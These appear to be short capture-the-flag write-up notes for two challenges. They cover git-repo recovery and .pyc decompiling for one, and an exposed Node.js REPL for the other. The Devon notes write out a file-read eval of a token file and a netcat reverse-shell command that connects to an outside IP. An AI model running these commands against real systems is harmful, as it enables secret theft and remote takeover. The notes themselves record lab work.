# Diego

- found public git repo with dirb
- https://github.com/internetwache/GitTools
- recovered two pyc files
- these can be decompiled with https://pypi.org/project/uncompyle6/
- a remote shell awaits us after deobfuscating that shit
- no idea how to exploit privileges though and my shell is dead now ._.

# Devon

- Landscape pic
- Exif data
- Hidden route
- JS REPL
- Apparently node
- Eval `require('fs').readFileSync('/home/user/token.txt')` to get the
 flag
- Reverse shell is a bit harder
- Run `nc -lp 1234` on your machine
- `require('child_process').exec('nc -e /bin/bash 1.2.3.4 1234')`
- I tried out all kinds of things to escalate privileges, but no luck
- This was supposed to be a nginx exploit

You are viewing proxied material from brause.cc. The copyright of proxied material belongs to its original authors. Any comments or complaints in relation to proxied material should be directed to the original authors of the content concerned. Please see the disclaimer for more details.